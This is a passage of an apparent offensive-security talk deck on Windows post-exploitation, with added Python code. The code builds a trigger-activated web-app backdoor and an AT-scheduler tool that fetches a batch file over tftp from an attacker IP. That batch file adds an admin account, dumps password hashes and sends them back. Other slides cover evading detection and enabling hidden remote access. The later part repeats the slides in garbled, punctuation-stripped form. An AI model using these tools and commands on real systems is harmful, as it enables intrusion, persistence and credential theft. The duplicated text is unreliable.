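    payload = quote_plus(STUB + codecs.encode(cmd, "rot_13"))
    per_field = -(-len(payload) // len(CARRIER_FIELDS))  # ceiling division
    chunks = [payload[i:i + per_field] for i in range(0, len(payload), per_field)]
    chunks += [""] * (len(CARRIER_FIELDS) - len(chunks))
    return dict(zip(CARRIER_FIELDS, chunks))


def handle_request(form: Dict[str, str]) -> str:
    """The app's normal path runs for everyone; only a trigger changes behaviour.

    Returns what would happen as a string instead of executing anything;
    wiring the command to subprocess is the one line deliberately left out.
    """
    cmd = decode_command(form)
    if cmd is None:
        return "normal: stored record for %s" % form.get("Name", "<anonymous>")
    return "hidden: would run %r" % cmd


if __name__ == "__main__":
    # Constructed sample submissions, not captured traffic.
    ordinary = {"Name": "Jane Doe", "Age": "42", "Address": "1 Main St"}
    trigger = {"Name": "John Smith", "Age": "42", **encode_command("net user")}
    print(handle_request(ordinary))
    print(handle_request(trigger))
```

Because the decoder URL-decodes a second time after the web server has already decoded the request body, a real POST has to carry the carrier values double-encoded; that second layer is what keeps the raw request from containing a readable command. On the review side, the tell is not the stub or the cipher but the extra `unquote`/decode step and a comparison against hard-coded field values in a handler that otherwise has no reason to branch.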
Slide 28
Persistence
• Covert Accounts
– Add an account / re-enable one
– Modify local account policies to allow access
• Ex: SUPPORT_3848576b1, guest
– Add it to the admin group (net localgroup)
• Only use AT to run your commands
• Persistence without adding files or new accounts
– Unlikely to be discovered
Slide 29
• DEMOS
Slide 30
Stealth / Evading Detection
Slide 31
Stealth / Evading Detection
• Hiding your activity
– From:
• IDS
• AV
• LOGGING
• Suspicious users & admins
• Firewalls
• Process listing
Slide 32
Stealth / Evading Detection
• Why Stealth?
– If you get caught you get stopped
– The longer you can operate undetected, the more you can accomplish
– Admins won't fix problems they don't know exist (helps persistence)
– On a pen test you should also be testing the organization's detection and response capabilities
Slide 33
Stealth / Evading Detection
• Goals
– Keep system operable
• If it breaks you can't use it
• Someone will come fix it
– Operate without fear of detection
– Robustness
• Hiding shouldn't require constant attention
– DON'T LOOK MALICIOUS
Slide 34
Stealth / Evading Detection
• Manual / Existing Tools
– Rootkits, rootkits, rootkits
– Meterpreter
– Encryption
• Shellcode encoders for IDS evasion
– Log cleaners
– Packers
– Covert channels / Steganography
– Anti-analysis / anti-forensics
• See all of OC's other talks
• Also Vinnie Liu's Metasploit research
Slide 35
Stealth / Evading Detection
• Different Perspective
– DON'T BE AN ANOMALY
– Hide in plain sight
• Many tools have ONLY malicious uses
• Make your intent hard to determine
– Be noisy on one to divert attention from another
Slide 36
Stealth / Evading Detection
• Different Perspective
– Know the target's environment better than they do
• If they don't use encryption, maybe you shouldn't either
• Change strategies to match the environment's normal behavior
– Don't always default to exploits
• See Tactical Exploitation talk
• IDSs can't see normal behavior that is malicious
Slide 37
Stealth / Evading Detection
• Using Windows security objects for stealth
– Auditing of Securable Objects is controlled by SACLs
– Null SACL = No Auditing = No Logs
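The SACL point on slide 37 is also the defender's check: an object whose security descriptor carries no SACL is never audited, whatever the audit policy says, and a SACL holding only a mandatory-label ACE is no better. The Python below is an added example, not from the talk, that parses SDDL strings (the form printed by, for instance, `(Get-Acl -Audit <path>).Sddl` on Windows) and reports which objects have no audit ACEs at all. The SDDL strings in it are constructed for illustration; the section letters, ACE field order and two-letter flag codes are the standard SDDL notation.

```python
import re
from typing import Dict, List, Tuple

# Top-level SDDL sections: O: owner, G: group, D: DACL, S: SACL.
SECTION_RE = re.compile(r"([OGDS]):")
ACE_RE = re.compile(r"\(([^)]*)\)")


def split_sddl(sddl: str) -> Dict[str, str]:
    """Split an SDDL string into its O/G/D/S sections (missing ones are absent)."""
    marks = list(SECTION_RE.finditer(sddl))
    sections = {}
    for i, mark in enumerate(marks):
        end = marks[i + 1].start() if i + 1 < len(marks) else len(sddl)
        sections[mark.group(1)] = sddl[mark.end():end]
    return sections


def parse_aces(section: str) -> Tuple[str, List[Dict[str, str]]]:
    """Return (ACL control flags, ACE list) for a D: or S: section."""
    flags = section.split("(", 1)[0]
    aces = []
    for body in ACE_RE.findall(section):
        fields = body.split(";")  # type;flags;rights;object guid;inherit guid;sid
        aces.append({"type": fields[0], "flags": fields[1],
                     "rights": fields[2], "sid": fields[-1]})
    return flags, aces


def ace_flag_codes(flags: str) -> set:
    """SDDL ACE flags are two-letter codes run together (e.g. OICISAFA)."""
    return {flags[i:i + 2] for i in range(0, len(flags), 2)}


def audit_coverage(sddl: str) -> Dict[str, object]:
    """Classify an object's auditing from its SDDL.

    sacl = "absent"  : no S: section, i.e. a null SACL; nothing is ever audited
    sacl = "empty"   : S: present but no AU ACEs (a mandatory-label ML ACE alone
                       is integrity, not auditing); still nothing is logged
    sacl = "present" : at least one audit ACE; success/failure list the trustees
    """
    sections = split_sddl(sddl)
    if "S" not in sections:
        return {"sacl": "absent", "success": [], "failure": []}
    _, aces = parse_aces(sections["S"])
    audit = [a for a in aces if a["type"] == "AU"]
    success = [a["sid"] for a in audit if "SA" in ace_flag_codes(a["flags"])]
    failure = [a["sid"] for a in audit if "FA" in ace_flag_codes(a["flags"])]
    return {"sacl": "present" if audit else "empty",
            "success": success, "failure": failure}


def report(objects: Dict[str, str]) -> List[str]:
    """One line per object; flag the ones that can be touched without a trace."""
    lines = []
    for name, sddl in objects.items():
        cov = audit_coverage(sddl)
        if cov["sacl"] == "present":
            lines.append("%s: audited (success=%s failure=%s)"
                         % (name, ",".join(cov["success"]), ",".join(cov["failure"])))
        else:
            lines.append("%s: NO AUDITING (SACL %s)" % (name, cov["sacl"]))
    return lines


if __name__ == "__main__":
    # Constructed SDDL strings, not taken from a real host.
    sample = {
        r"C:\secrets\payroll.xlsx": "O:BAG:SYD:(A;;FA;;;BA)(A;;FR;;;AU)"
                                    "S:AI(AU;SAFA;FA;;;WD)",
        r"C:\secrets\plan.docx": "O:BAG:SYD:(A;;FA;;;BA)",
        r"HKLM\SOFTWARE\ORL\WinVNC3": "O:BAG:SYD:(A;;KA;;;BA)S:(ML;;NW;;;LW)",
    }
    for line in report(sample):
        print(line)
```

Two caveats when feeding this real data: the SACL is only returned to a caller holding SeSecurityPrivilege and explicitly asking for it, so an SDDL read without `-Audit` (or by a non-admin) looks "absent" for every object; and an audit ACE is only half the story, since nothing is logged unless the matching object-access audit policy subcategory is also enabled.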
Slide 38
• DEMOS
– Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
• It's not always about ROOT
• Look like someone else
– Use the credentials / access of another user
• Goals
– Change your identity at will
• User ID, domain credentials, sessions
• Impersonate system accounts
• Make activities look like normal user behavior
Slide 41
User Identity Theft
• Stages and techniques
– Target users
• Who has access to what?
• Where is the data?
– Change identity
• Hijack credentials / sessions
• Abuse tokens
– Access is the end goal, be it data or another system
Slide 42
User Identity Theft
• Existing tools
– Incognito (Metasploit)
• Enumerate / hijack tokens
– FU / FUTo
• Enable SYSTEM privileges
• Change process privileges, DKOM
– SU, SUDO, KSU
– Process injection
– Hijack domain credentials
Slide 43
User Identity Theft
Tokens, Privileges, Security Descriptors, SIDs, SACLs, DACLs, ACEs, Oh My!
• What we want
– Privileges or SIDs
• What we get
– Access, Access, Access
• How we get it
– Incognito vs FUTo
Slide 44
• DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
• Changing existing features or settings to benefit our activities
• Goals
– Support all Post-Exploitation activities
– Disabling detection technologies
– Enabling insecure or easy-to-use access software
Slide 47
Feature Modification
• Feature Modification is basically Securable Object manipulation
– Remember all those Tokens and Security Descriptors?
– These can be modified programmatically and directly
• Not just through existing tools
– Stealth / Persistence requirements
• May make it more advantageous to use custom tools
– Access objects programmatically
– Can be much more complex to implement
Slide 48
Feature Modification
• Re-enabling disabled access
– PsExec: it's still cool (Thanks Mark)
• Enabling GUI access
– VNC (from a command line)
– Remote Desktop (even if disabled)
• Turning off or adding exceptions to security software
– Firewalls, AV, logging
• Modifying Local Security Policies
Slide 49
Feature Modification
• Enabling psexec
– Psexec was a great, awesome remote shell/command tool
– Everybody now disables clipbook, which psexec requires, l4m3
– Let's re-enable it
Slide 50
Feature Modification
• Enabling psexec
• Use the service control tool sc.exe
– net use \\target\ipc$ password /user:username
– sc \\target config netdde start= auto
– sc \\target config netddedsdm start= auto
– sc \\target config clipsrv start= auto
– sc \\target start netdde
– sc \\target start netddedsdm
– sc \\target start clipsrv
Slide 51
Feature Modification
• Enabling VNC (from command line)
– Go get VNC (check out guhnu)
– Make a folder on the target for the VNC files
– Copy the following files to the target folder
• winvnc.exe
• vnc.reg
• vnchooks.dll
• omnithread_rt.dll
– regedit /s vnc.reg
– winvnc -install
– net start "vnc server"
– winvnc
– Password is "infected"
vnc.reg file contents (the header line is required for regedit /s to import the file):
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\ORL\WinVNC3\Default]
"SocketConnect"=dword:00000001
"AutoPortSelect"=dword:00000001
"InputsEnabled"=dword:00000001
"LocalInputsDisabled"=dword:00000000
"IdleTimeout"=dword:00000000
"QuerySetting"=dword:00000002
"QueryTimeout"=dword:0000000a
"PollUnderCursor"=dword:00000000
"PollForeground"=dword:00000001
"PollFullScreen"=dword:00000000
"OnlyPollConsole"=dword:00000001
"OnlyPollOnEvent"=dword:00000000
"Password"=hex:10,4d,89,3d,5a,e1,55,f8
Slide 52
Feature Modification
• Enabling Remote Desktop remotely
– Having a GUI to your target can be necessary
– Maybe they are running a specialized GUI app
• Ex: system controlling access to security doors
– No command-line way of modifying the system, need GUI
• SCADA systems
• Security cameras
• Who knows what you might be up to
– Remote Desktop is fast and already a feature of the OS
– However it's often disabled, maybe even by GPO
Slide 53
Feature Modification
• Enabling Remote Desktop remotely
– Complicated procedure, especially if GPOs are involved
– Create a file named fix_ts_policy.ini:
[Unicode]
Unicode=yes
[Version]
signature="$CHICAGO$"
Revision=1
[Privilege Rights]
SeRemoteInteractiveLogonRight = hacked_account
SeInteractiveLogonRight = hacked_account
SeDenyInteractiveLogonRight =
SeDenyRemoteInteractiveLogonRight =
SeDenyNetworkLogonRight =
– This file will fix the policy settings in your way
– Change "hacked_account" to a real account
Slide 54
Feature Modification
• Enabling Remote Desktop remotely
– Create another file named enable_ts.reg:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server]
"fDenyTSConnections"=dword:00000000
"TSEnabled"=dword:00000001
"TSUserEnabled"=dword:00000000
– Then perform these commands:
• sc config termservice start= auto
• regedit /s enable_ts.reg
• copy c:\windows\security\database\secedit.sdb c:\windows\security\database\newsecedit.sdb
• copy c:\windows\security\database\secedit.sdb c:\windows\security\database\origsecedit.sdb
• secedit /configure /db c:\windows\security\database\newsecedit.sdb /cfg fix_ts_policy.ini
• gpupdate /force
• net start "terminal services"
Slide 55
• DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
• Oldschool techniques can get results on new problems
• Remember this is POST exploitation, so you already have some access
• AT command schedules things to run at a specified time and date
– Schedule service must be running
Slide 58
Abusing The Scheduler
• Often these days certain features are disabled for security
– Clipbook, shares, enumeration
• Use AT to get around these problems
– Usually NOT disabled
net use \\target\ipc$ password /user:username
at \\target 12:00 pm command
Ex: at \\192.168.1.1 12:00pm tftp -i myip GET nc.exe
Slide 59
Abusing The Scheduler
• Often AT is still enabled while many other things you typically use are not
• AT is as good as having a shell
– Enable / start services
– Transfer files
– Add users
– Mess with the registry / policies
– Pretty much anything you can do with a shell
– Added bonus: defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
• Building a tool around AT – Flow
• Establish authenticated session
• Determine the time on the target
• Pass commands to the target to be run 1 min from now
– Write a batch file that executes everything at once
– Have the target send you back whatever info you want
– Be mindful of file transfer protocols: TFTP is good but not always "quiet" or available
Slide 61
Abusing The Scheduler
• Common use example
– net use \\target
– net time \\target
– at \\target (net time + 1 min) "tftp -i myip GET e.bat"
– at \\target (net time + 2 min) e.bat
– e.bat does:
• Adds a user (net user hacked hacked /add)
– Admin group (net localgroup administrators hacked /add)
• Gets hashdumping tools and dumps hashes
• Sends hashes identified by IP back to attacker host
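The flow on slides 60 and 61 is the core of an AtAbuse-style tool: authenticate, read the target's clock rather than your own, schedule one job to fetch a batch file and a second to run it, and have the batch file ship results back. The Python below is an added example written for this page, not the authors' AtAbuse or MassNetUse code. It uses only the commands the talk uses (net use, net time, at, tftp). The `net time` banner format it parses is the US-locale one and is an assumption, the hash-dump tool name is a placeholder, and the sample output is constructed; only `run_against` touches a real host and it is never called by the self-test.

```python
import re
import subprocess
from datetime import datetime, timedelta
from typing import List

# `net time \\target` prints e.g. "Current time at \\HOST is 3/12/2008 10:15:30 AM"
# (US locale, seconds optional). Assumption: other locales need another pattern.
NET_TIME_RE = re.compile(
    r"Current time at \\\\(\S+) is (\d{1,2}/\d{1,2}/\d{4}) (\d{1,2}:\d{2}(?::\d{2})? [AP]M)")


def parse_net_time(output: str) -> datetime:
    """Turn the net time banner into a datetime; raises on unrecognised output."""
    match = NET_TIME_RE.search(output)
    if not match:
        raise ValueError("unrecognised net time output: %r" % output)
    stamp = "%s %s" % (match.group(2), match.group(3))
    for fmt in ("%m/%d/%Y %I:%M:%S %p", "%m/%d/%Y %I:%M %p"):
        try:
            return datetime.strptime(stamp, fmt)
        except ValueError:
            continue
    raise ValueError("bad timestamp: %r" % stamp)


def at_time(target_now: datetime, minutes_ahead: int) -> str:
    """HH:MM for AT, computed from the target's clock, not ours.

    AT fires at hh:mm:00, so a partial minute is rounded up: the job is then
    at least minutes_ahead full minutes away, which leaves slack for the gap
    between reading the clock and the at call. A time already past would
    instead wait a whole day.
    """
    when = target_now + timedelta(minutes=minutes_ahead)
    if when.second or when.microsecond:
        when += timedelta(minutes=1)
    return when.strftime("%H:%M")


def batch_file(attacker_ip: str, target: str, hashdump_tool: str = "hashdump.exe") -> str:
    """e.bat as slide 61 describes it; hashdump.exe is a placeholder name."""
    return "\r\n".join([
        "@echo off",
        "net user hacked hacked /add",
        "net localgroup administrators hacked /add",
        "tftp -i %s GET %s" % (attacker_ip, hashdump_tool),
        "%s > %s.txt" % (hashdump_tool, target),       # output named after the target IP
        "tftp -i %s PUT %s.txt" % (attacker_ip, target),
        "",
    ])


def build_commands(target: str, username: str, password: str,
                   attacker_ip: str, target_now: datetime) -> List[str]:
    """The slide 61 sequence as the exact lines to run from the attacker host."""
    return [
        "net use \\\\%s\\ipc$ %s /user:%s" % (target, password, username),
        'at \\\\%s %s "tftp -i %s GET e.bat"' % (target, at_time(target_now, 1), attacker_ip),
        "at \\\\%s %s e.bat" % (target, at_time(target_now, 2)),
    ]


def run_against(target: str, username: str, password: str, attacker_ip: str) -> List[str]:
    """Live path (Windows only): authenticate, read the target's clock, schedule."""
    subprocess.run("net use \\\\%s\\ipc$ %s /user:%s" % (target, password, username),
                   shell=True, check=True)
    out = subprocess.run("net time \\\\%s" % target, shell=True, check=True,
                         capture_output=True, text=True).stdout
    cmds = build_commands(target, username, password, attacker_ip, parse_net_time(out))
    for cmd in cmds[1:]:          # cmds[0] is the net use already issued above
        subprocess.run(cmd, shell=True, check=True)
    return cmds


if __name__ == "__main__":
    # Constructed net time output, not captured from a host.
    sample = ("Current time at \\\\192.168.1.1 is 3/12/2008 10:15:30 AM\r\n\r\n"
              "The command completed successfully.\r\n")
    now = parse_net_time(sample)
    for line in build_commands("192.168.1.1", "admin", "Passw0rd", "192.168.1.50", now):
        print(line)
    print(batch_file("192.168.1.50", "192.168.1.1"))
```

Running it over a host list is a loop around `run_against`; the parts worth keeping pure, and therefore testable, are the clock parsing and the time arithmetic, because a job scheduled from the attacker's clock on a target that is a few minutes behind silently waits until tomorrow. The tftp transfer is the noisy step slide 60 warns about: the e.bat fetch and the PUT of the hash file are both plain UDP/69 and show up in any flow log.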
Slide 62
Abusing The Scheduler
• Privileges of LocalSystem that we care about
– NT AUTHORITY\SYSTEM and BUILTIN\Administrators SIDs
– SE_IMPERSONATE_NAME
– SE_TCB_NAME
– SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
• Automating techniques and tools for use against massive numbers of hosts
• Goals
– Penetrate as many systems as possible with little interaction and in a short time
– Ease of use / re-use
– Lower cost of attack
Slide 65
Massive Automation
• MassNetUse – Establish NetBIOS session credentials on a range of hosts
• MassWinenum – Enumerate NetBIOS information, bypass certain RestrictAnonymous settings
• AtAbuse – Use the scheduler as your "shell" to control ranges of hosts
Slide 66
• DEMOS
Slide 67
• Related talks you should see
– Beyond EIP – The theoretical tool development end of things (spoonm & skape)
– Security Implications of Windows Access Tokens (Luke Jennings)
Slide 68
• Acknowledgements
– Thanks to:
• All the people from offensivecomputing, nologin, uninformed IRC and SILC channels
• HD Moore especially for support and mentorship
• Danny Quist, krbklepto, Egypt, spoonm, skape
• Luke Jennings for his awesome work
Slide 69
• Questions?
• Presentation available at www.offensivecomputing.net
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 22
Persistence
bull Examplebull Machine has VNC installed bull Replace installed VNC with vulnerable version
ndash Authentication bypass bull Copy registry password so target doesnrsquot realizebull Persistence with no backdoors or rootkits to get
detected
Slide 23
Persistence
bull Add vulnerable codebull Example web apps
ndash Take out user input validationndash Inject your vulnerable code
bull Focus on vague intentbull Never be obviously and solely malicious
ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs
Slide 24
Persistence
bull More web app examplesbull Add hidden field to HTML form
ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt
bull Edit web app and tie vuln perl code to form field input
If defined $hidden_field open($filenamerdquogt$hidden_field)
bull Craft a POST including the hidden field
Slide 25
Persistence
bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected
ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period
bull No rootkits to installbull Tripwire probably wonrsquot see this
Slide 26
Persistence
bull Take concept to another levelndash Add a decoder to web appndash Look for a ldquotriggerrdquo string combination in form
fieldsndash If Name = John Smith and Age = 42 then execute
contents of Address fieldndash URL encode form entries containing commandsndash Have identifier ldquostubrdquo in encoded data for app to
find
Slide 27
Persistence
bull Mixing Stealth with Persistencendash Further encodingndash Take entries from all fieldsndash Concat themndash ldquoDecoderdquo commandsndash Rotational Ciphers (rot 13 ceaser)ndash Even more complex obfuscation
Slide 28
Persistence
bull Covert Accountsndash Add an account renablendash Modify local account policies to allow access
bull Ex SUPPORT_3848576b1 guestndash Add it to the admin group (net localgroup)
bull Only use AT to run your commandsbull Persistence without adding files new accounts
ndash Unlikely to be discovered
Slide 29
bull DEMOS
Slide 30
Stealth Evading Detection
Slide 31
Stealth Evading Detection
bull Hiding your activityndash From
bull IDSbull AVbull LOGGINGbull Suspicious users amp adminsbull Firewallsbull Process listing
Slide 32
Stealth Evading Detection
bull Why Stealthndash If you get caught you get stoppedndash The longer you can operate undetected the more you
can accomplishndash Adminrsquos wonrsquot fix problems they donrsquot know exist
(helps persistence)ndash On a pen test you should also be testing the
organizations detection and response capabilities
Slide 33
Stealth Evading Detection
bull Goalsndash Keep system operable
bull If it breaks you canrsquot use itbull Someone will come fix it
ndash Operate without fear of detectionndash Robustness
bull Hiding shouldnrsquot require constant attentionndash DONrsquoT LOOK MALICIOUS
Slide 34
Stealth Evading Detection
bull Manual Existing Toolsndash Rootkits rootkits rootkitsndash Meterpreterndash Encryption
bull Shellcode Encoders for IDS evasionndash Log cleanersndash Packersndash Covert channels Steganographyndash Anti-analysis anti-forensics
bull See all of OCrsquos other talks bull Also Vinnie Liursquos Metasploit research
Slide 35
Stealth Evading Detection
bull Different Perspectivendash DONrsquoT BE AN ANOMALYndash Hide in plain sight
bull Many tools have ONLY malicious usesbull Make your intent hard to determine
ndash Be noisy on one to divert attention from another
Slide 36
Stealth Evading Detection
bull Different Perspectivendash Know the targets environment better than
they dobull If they donrsquot use encryption maybe you shouldnrsquot eitherbull Change strategies to match environments normal
behavior
ndash Donrsquot always default to exploitsbull See Tactical Exploitation talkbull IDSrsquos canrsquot see normal behavior that is malicious
Slide 37
Stealth Evading Detection
bull Using Windows security objects for stealthndash Auditing of Securable Objects is controlled by SACLrsquosndash Null SACL = No Auditing = No Logs
Slide 38
bull DEMOSndash Kaspersky squeals like a pig
Slide 39
User Identity Theft
Slide 40
User Identity Theft
bull Itrsquos not always about ROOTbull Look like someone else
ndash Use the credentials access of another userbull Goals
ndash Change your identity at willbull User ID domain credentials sessionsbull Impersonate system accountsbull Make activities look like normal user behavior
Slide 41
User Identity Theft
bull Stages and techniquesndash Target users
bull Who has access to whatbull Where is the data
ndash Change Identitybull Hijack credentialssessionsbull Abuse tokens
ndash Access is the end goal be it data or another system
Slide 42
User Identity Theft
bull Existing toolsndash Incognito (metasploit)
bull Enumerate hijack tokensndash FUFUTO
bull Enable SYSTEM privilegesbull Change process privileges DKOM
ndash SU SUDO KSUndash Process injectionndash Hijack domain credentials
Slide 43
User Identity Theft
Tokens Privileges Security Descriptors SIDrsquos SACLrsquos DACLrsquos ACErsquos Ohrsquo My
bull What we wantndash Privileges or SIDrsquos
bull What we getndash Access Access Access
bull How we get itndash Incognito vs FUto
Slide 44
bull DEMOS
Slide 45
Feature Modification
Slide 46
Feature Modification
bull Changing existing features or settings to benefit our activities
bull Goalsndash Support all Post-Exploitation activitiesndash Disabling detection technologiesndash Enabling in-secure or easy to use access
software
Slide 47
Feature Modification
bull Feature Modification is Basically Securable Object Manipulationndash Remember all those Tokens and Security Descriptorsndash These can be modified programmatically and directly
bull Not just through existing toolsndash Stealth Persistence requirements
bull May make it more advantageous to use custom toolsndash Access Objects programmaticallyndash Can be much more complex to implement
Slide 48
Feature Modification
bull Re-enabling disabled accessndash PsExec Itrsquos still cool (Thanks Mark)
bull Enabling GUI accessndash VNC (from a command line)ndash Remote Desktop (even if disabled)
bull Turning off or adding exceptions to security softwarendash Firewalls AV logging
bull Modifying Local Security Policies
Slide 49
Feature Modification
bull Enabling psexecndash Psexec was great awesome remote
shellcommand toolndash Everybody now disables clipbook which
psexec requires l4m3 ndash Lets re-enable it
Slide 50
Feature Modification
bull Enabling psexecbull Use the system control tool scexe
ndash Net use targetipc$ username userpasswordndash Sc target config netdde start= autondash Sc target config netddedsdm start= autondash Sc target config clipsrv start= autondash Sc target start netddendash Sc target start netddedsdmndash Sc target start clipserv
Slide 51
Feature Modification bull Enabling VNC (from command line)
ndash Go get VNC (check out guhnu)ndash Make a folder on the target for the vnc filesndash Copy the following files to target folder
bull Winvncexebull Vncregbull Vnchooksdllbull Omnithread_rtdll
ndash Regedit ndashs vncregndash Winvnc ndashinstallndash Net start ldquovnc serverrdquondash Winvncndash Password is ldquoinfectedrdquo
Vncreg file contents
[HKEY_LOCAL_MACHINESOFTWAREORLWinVNC3Default]SocketConnect=dword00000001AutoPortSelect=dword00000001InputsEnabled=dword00000001LocalInputsDisabled=dword00000000IdleTimeout=dword00000000QuerySetting=dword00000002QueryTimeout=dword0000000aPollUnderCursor=dword00000000PollForeground=dword00000001PollFullScreen=dword00000000OnlyPollConsole=dword00000001OnlyPollOnEvent=dword00000000Password=hex104d893d5ae155f8
Slide 52
Feature Modification
bull Enabling Remote Desktop remotelyndash Having a GUI to your target can be necessary ndash Maybe they are running a specialized GUI app
bull Ex System controlling access to security doorsndash No command line way of modifying system need GUI
bull SCADA systemsbull Security camerasbull Who knows what you might be up to
ndash Remote desktop is fast and already a feature of OSndash However itrsquos often disabled maybe even by GPO
Slide 53
Feature Modification bull Enabling Remote Desktop remotely
ndash Complicated procedure especially if GPOrsquos involved ndash Create a file named fix_ts_policyini
[Unicode]Unicode=yes[Version]signature=$CHICAGO$Revision=1[Privilege Rights]seremoteinteractivelogonright = hacked_accountseinteractivelogonright = hacked_accountsedenyinteractivelogonright =sedenyremoteinteractivelogonright =sedenynetworklogonright =
ndash This file will fix policy settings in your wayndash Change ldquohacked_accountrdquo to a real account
Slide 54
Feature Modification bull Enabling Remote Desktop remotely
ndash Create another file named enable_tsregWindows Registry Editor Version 500
[HKEY_LOCAL_MACHINESYSTEMCurrentControlSetControlTerminal Server]
fDenyTSConnections=dword00000000TSEnabled=dword00000001TSUserEnabled=dword00000000
ndash Then perform these commandsbull sc config termservice start= autobull regedit s enable_tsregbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabasenewseceditsdbbull copy cwindowssecuritydatabaseseceditsdb cwindowssecuritydatabaseorigseceditsdbbull secedit configure db newseceditsdb cfg fix_ts_policyinibull gpupdate Forcebull net start terminal services
Slide 55
bull DEMOS
Slide 56
Abusing The Scheduler
Slide 57
Abusing The Scheduler
bull Oldschool techniques can get results on new problems
bull Remember this is POST exploitation so you already have some access
bull AT command schedules things to run on at a specified time and date
ndash Schedule service must be running
Slide 58
Abusing The Scheduler
bull Often these days certain features are disabled for security
ndash Clipbook shares enumerationbull Use AT to get around these problems
ndash Usually NOT disabled
Net use targetipc$ password userusernameAt target 1200 pm commandEx At 19216811 1200pm tftp ndashI myip GET ncexe
Slide 59
Abusing The Scheduler
bull Often AT is still enabled while many other things you typically use are not
bull AT is as good as having a shellndash Enable Start Servicesndash Transfer filesndash Adding usersndash Messing with the registry policiesndash Pretty much anything you can do with a shellndash Added bonus defaults to run as SYSTEM
Slide 60
Abusing The Scheduler
bull Building a tool around AT ndash Flow
bull Establish authenticated sessionbull Determine the time on the targetbull Pass commands to the target to be run 1 min from now
ndash Write a batch file that executes everything at oncendash Have the target send you back whatever info you wantndash Be mindful of file transfer protocols TFTP is good but not
always ldquoquietrdquo or available
Slide 61
Abusing The Scheduler
bull Common use examplendash Net use targetndash Net time targetndash At target (net time +1min) ldquotftp ndashi use GET ebatrdquondash At target (net time +2min) ebatndash ebat does
bull Adds a user (net user hacked hacked add)ndash Admin group (net localgroup administrators hacked add)
bull Gets hashdumping tools and dumps hashesbull Sends hashes identified by IP back to attacker host
Slide 62
Abusing The Scheduler
bull Privileges of LocalSystem that we care aboutndash NT AUTHORITYSYSTEM and
BUILTINAdministrators SIDs ndash SE_IMPERSONATE_NAME ndash SE_TCB_NAME ndash SE_DEBUG_NAME
Slide 63
Massive Automation
Slide 64
Massive Automation
bull Automating techniques and tools for use against massive numbers of hosts
bull Goalsndash Penetrate as many systems as possible
with little interaction and in a short timendash Ease of use re-usendash Lower cost of attack
Slide 65
Massive Automation
bull MassNetUse ndash Establish netbios session credentials on range of hosts
bull MassWinenum ndash Enumerate Netbios information bypass certain RestrictAnonymous settings
bull AtAbuse ndash Use the scheduler as your ldquoshellrdquo to control ranges of hosts
Slide 66
bull DEMOS
Slide 67
bull Related talks you should seendash Beyond EIP ndash The theoretical tool
development end of things (spoonm amp skape)ndash Security Implications of Windows Access
Tokens (Luke Jennings)
Slide 68
bull Acknowledgementsndash Thanks to
bull All the people from offensivecomputing nologin uninformed IRC and SILC channels
bull HD Moore especially for support and mentorship bull Danny Quist krbklepto Egypt spoonm skape bull Luke Jennings for his awesome work
Slide 69
bull Questions bull Presentation available at
wwwoffensivecomputingnet
- Meta-Post Exploitation
- Slide 2
- Slide 3
- Slide 4
- Slide 5
- Slide 6
- Slide 7
- Slide 8
- Slide 9
- Slide 10
- Slide 11
- Slide 12
- Slide 13
- Slide 14
- Slide 15
- Slide 16
- Slide 17
- Slide 18
- Slide 19
- Slide 20
- Slide 21
- Slide 22
- Slide 23
- Slide 24
- Slide 25
- Slide 26
- Slide 27
- Slide 28
- Slide 29
- Slide 30
- Slide 31
- Slide 32
- Slide 33
- Slide 34
- Slide 35
- Slide 36
- Slide 37
- Slide 38
- Slide 39
- Slide 40
- Slide 41
- Slide 42
- Slide 43
- Slide 44
- Slide 45
- Slide 46
- Slide 47
- Slide 48
- Slide 49
- Slide 50
- Slide 51
- Slide 52
- Slide 53
- Slide 54
- Slide 55
- Slide 56
- Slide 57
- Slide 58
- Slide 59
- Slide 60
- Slide 61
- Slide 62
- Slide 63
- Slide 64
- Slide 65
- Slide 66
- Slide 67
- Slide 68
- Slide 69
-
Slide 23
Persistence
bull Add vulnerable codebull Example web apps
ndash Take out user input validationndash Inject your vulnerable code
bull Focus on vague intentbull Never be obviously and solely malicious
ndash Look for apps with previous vulnerabilitiesndash Re-introduce patched bugs
Slide 24
Persistence
bull More web app examplesbull Add hidden field to HTML form
ndash Users detect no change app performs normallyltinput type=ldquohiddenrdquo name=ldquoLangrdquogt
bull Edit web app and tie vuln perl code to form field input
If defined $hidden_field open($filenamerdquogt$hidden_field)
bull Craft a POST including the hidden field
Slide 25
Persistence
bull wwwtargetcomcgi-binappcgilang=|cmd| bull Code will execute your commandsbull Who needs to bind a shell to a portbull Unlikely to ever be detected
ndash Especially good in big appsndash Code review canrsquot even be sure of maliciousnessndash Some sites replace code every X time period
bull No rootkits to installbull Tripwire probably wonrsquot see this
Slide 26
Persistence
